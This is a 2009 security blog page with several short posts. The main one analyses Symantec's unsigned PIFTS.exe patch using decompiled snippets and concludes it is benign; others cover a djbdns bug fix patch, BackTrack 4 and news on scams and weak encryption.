Symantec creates havoc with unsigned Norton patch – PIFTS.EXE

On March 11, 2009, In Hacking and Pentesting, By Shinnok

Conspiracy theories fly around Norton forum ‘Pifts’ purge

Conspiracy theories are running rampant in the absence of a clear explanation of why Symantec deleted threads expressing concern about a file called pifts.exe from its Norton support forums.

Many users running Norton Internet Protection began seeing a popup warning on Monday that a file called PIFTS.exe on their systems was trying to access the internet. The location of the file was given as a non-existent folder buried inside the Symantec LiveUpdate folder.

The appearance of a file in a non-existent folder suggests rootkit-like behaviour. PIFTS.exe attempts to contact a server in Africa, which has been traced to Symantec.

Concerned punters started posting on Norton’s support forums, asking what was going on. That’s all normal enough, but then discussions on the subject were deleted without explanation from Norton’s community pages. Follow-up threads mentioning the issue were deleted even more quickly.

source

Symantec creates havoc with unsigned Norton patch

Symantec released a diagnostic patch for some of its older Norton products on Monday night that did not identify its origin and thus triggered alerts on user firewalls, the company said Tuesday.

The patch for 2006 and 2007 versions of Norton Internet Security and Norton Antivirus, a program dubbed “PFST.exe,” (Product Information Framework Trouble Shooter) was distributed to collect anonymous statistics on matters such as how many computers are using the products and what operating system they are running, Jeff Kyle, group product manager for Symantec consumer products, said Tuesday.

Because it was unsigned–a result of human error–firewalls started prompting users with messages asking them if they trust the patch, Kyle said. Of course, because the patch had no signature indicating it was from Symantec, users didn’t know whether to trust it and many of them went to the Norton user forum for answers.

The company pulled the patch after three hours and then unwittingly laid the groundwork for conspiracy theorists after it started deleting forum posts related to the matter. The company was not censoring the posts, but fighting off a spam attack, according to Kyle.

“At the same time we were pulling down the patch a spammer created a new account on our forum and minutes after that there were 200 new users all targeting the same thread,” he said. “Within the first hour there were like 600 posts to that thread. Obviously it was a bot creating this.”

The posts were written with poor grammar and broken English and some were vulgar and nonsensical. It is possible, though, that Symantec could have inadvertently deleted some legitimate posts while it was purging the spam, Kyle said.

“There is no conspiracy theory. There’s nothing we are hiding at all,” Kyle added.

Meanwhile, Kyle said he isn’t sure whether or when Symantec will redistribute the patch, but if they do, he said, it will be signed.

Symantec has more information on its message board site. The Washington Post reported that hackers were exploiting the situation and had managed to get malicious Web sites into top Google search results for “pifts.exe.”

source

Digg in:

http://chrysler5thavenue.blogspot.com/2009/03/piftsexe.html

http://www.abovetopsecret.com/forum/thread444230/pg1

http://blogs.howstuffworks.com/2009/03/10/what-is-piftsexe/

http://www.theregister.co.uk/2009/03/10/norton_pifts_mystery/

http://news.cnet.com/8301-1009_3-10192899-83.html?part=rss&subj=news&tag=2547-1_3-0-20

http://isc.sans.org/diary.html?storyid=5992

http://it.slashdot.org/article.pl?sid=09/03/10/139229

http://www.tech-linkblog.com/2009/03/conspiracy-theories-run-rampant-due-to-piftsexe.html/

http://voices.washingtonpost.com/securityfix/2009/03/symantec_users_complain_of_mys.html

http://community.norton.com/norton/board/message?board.id=nis_feedback&thread.id=39119

http://www.virustotal.com/analisis/734465e30a6ee6d6c493471d77940f4c

http://www.threatexpert.com/report.aspx?md5=91b564d825a3487ae5b5fafe57260810

http://www.mediafire.com/download.php?iotyqjbrmry – pifts.exe asm code from IDA and C-like decompiled pseudocode from HexRays Decompiler

The disassembly of the binary doesn’t look out of the ordinary and after a quick look at the PIFTS.c decompiled code in the above archive it seems that symantec is telling nothing but the truth.

Snips:

$cat PIFTS.c | grep -i RegOpenKey
// LSTATUS __stdcall RegOpenKeyExW(HKEY hKey, LPCWSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult); idb
v1 = RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey);
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
&& (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)

$cat PIFTS.c | grep -i http
extern wchar_t aHttpStats_nort[40]; // weak
sub_402210((int)L”http://stats.norton.com/n/p?module=2667″, (int)&lpszUrl);

$cat PIFTS.c | grep -i symantec
v1 = RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey);
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
&& (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L”Software\\Symantec\\InstalledApps”, 0, 1u, &hKey)
L”SOFTWARE\\Symantec\\PIF\\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\\PifEngine”,
L”SOFTWARE\\Symantec\\PIF\\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\\HbEngine”,
L”SOFTWARE\\Symantec\\PIF\\{96E26A03-A25A-400b-B9B4-564C9BD00F46}”,

For me it doesn’t sound like much of a conspiracy or an uber slick big brother spyware because Symantec’s explanation of pifts.exe is somewhat reasonable although the method they used to get the stats is questionable and unprofessional(don’t they have test systems, labs or networks? why push stuff that should be tested in the “development labs” to clients? clients are not a testing platform) and Symantec removing forum posts when they look like this doesn’t bother me either. People who started this fire are ones who don’t have the skills to reverse engineer an executable because if they did they would know that there isn’t really nothing interesting in pifts code. Another reason for this might be this one too:

Finally, it has also been reported by the Washington Post that hackers are taking advantage of this situation. ”Some of the top searches (currently the 3rd and 4th result in a Google search) are Web sites that try to install malicious software when you visit them.” When searching for information on “pifts.exe,” Symantec strongly advises all users to be wary of following links to unknown sites as malicious users are attempting to use this hot topic to distribute malware.

Although it is hard to believe that this was a planned scam because you really have to be a con mastermind in order to think(of it previously and wait for the right moment), spot the apropriate moment(symantec’s pifts.exe unsigned and questionable push update), prepare(create bogus trap websites/page related to the subject and embedd exploit+malware code) and fire the scam(make people believe your conspiracy theory-the symantec forums, the stories, blog posts) then watch your botnet(s) grow. As it is written above it is more probably that bad guys saw the opportunity after the hype has been created and started to take advantage of it.

Tagged with:
 
0 Comments
Leave A Response

How will your site be attacked if you make it high in google

On March 6, 2009, In Hacking and Pentesting, By Shinnok

Well if you have the luck to get a high pagerank and really show up alot in google searches then you automatically get this free gift. Those are http download stats or better called http get commands issued to the server and you should not confuse that page with hack attempts. Do you see the immense amount of bot web attacks, mostly rfi and lfi? Well i’ve seen some of that as soon as google indexed my site and started showing it in searches. The conclusion is, if you don’t know this already, if you want to have your own server under your administration you’d better be having the necessary skills to secure it, because if you don’t, then your website and/or server won’t stand up for too long before getting pwned.

Tagged with:
 
0 Comments
Leave A Response

Djbdns bug finder awarded 1000$

On March 4, 2009, In Hacking and Pentesting, By Shinnok

From: D. J. Bernstein <djb <at> cr.yp.to>
Subject: djbdns<=1.05 lets AXFRed subdomains overwrite domains
Newsgroups: gmane.network.djbdns
Date: 2009-03-04 01:34:21 GMT (11 hours and 49 minutes ago)

If the administrator of example.com publishes the example.com DNS data
through tinydns and axfrdns, and includes data for sub.example.com
transferred from an untrusted third party, then that third party can
control cache entries for example.com, not just sub.example.com. This is
the result of a bug in djbdns pointed out by Matthew Dempsky. (In short,
axfrdns compresses some outgoing DNS packets incorrectly.)
Even though this bug affects very few users, it is a violation of the
expected security policy in a reasonable situation, so it is a security
hole in djbdns. Third-party DNS service is discouraged in the djbdns
documentation but is nevertheless supported. Dempsky is hereby awarded
$1000.
The next release of djbdns will be backed by a new security guarantee.
In the meantime, if any users are in the situation described above,
those users are advised to apply Dempsky's patch and requested to accept
my apologies. The patch is also recommended for other users; it corrects
the bug without any side effects. A copy of the patch appears below.
---D. J. Bernstein
   Research Professor, Computer Science, University of Illinois at Chicago
--- response.c.orig     2009-02-24 21:04:06.000000000 -0800
+++ response.c  2009-02-24 21:04:25.000000000 -0800
@@ -34,7 +34,7 @@
         uint16_pack_big(buf,49152 + name_ptr[i]);
         return response_addbytes(buf,2);
       }
-    if (dlen <= 128)
+    if ((dlen <= 128) && (response_len < 16384))
       if (name_num < NAMES) {
        byte_copy(name[name_num],dlen,d);
        name_ptr[name_num] = response_len;
source
djbdns
Tagged with:
 
0 Comments
Leave A Response

Security fail

On February 20, 2009, In Hacking and Pentesting, Phun, By Shinnok

fail-owned-anti-theft-fail

I couldn’t help to think about the stunning resemblance of this image with the Internet Security mentality and practices of nowadays.

Tagged with:
 
0 Comments
Leave A Response

If you want to buy a hardware encrypted hdd…think again

On February 20, 2009, In Hacking and Pentesting, Hardware, By Shinnok

Read this fine analysis of Raidon Staray-S Series hardware encrypted hdds  on Heise Security:

Budget encryption – Attacking a weak crypto system

So next time think again, read about it, investigate it before buying such a hdd and trusting it with your most precious data.

Tagged with:
 
0 Comments
Leave A Response

Update on the worldwide blitzkrieg card scam

On February 13, 2009, In Hacking and Pentesting, By Shinnok

A foxnews report on  130 ATM machines in 49 cities worldwide pwned in 30 minutes:

Tagged with:
 
0 Comments
Leave A Response

BackTrack 4 beta released

On February 11, 2009, In Hacking and Pentesting, By Shinnok

bt4_logo

http://remote-exploit.org/backtrack_download.html ^^

You can read more about the release here.

( have mercy on the webserver :lol: )

Tagged with:
 
0 Comments
Leave A Response
« Older Rants
Go To Top »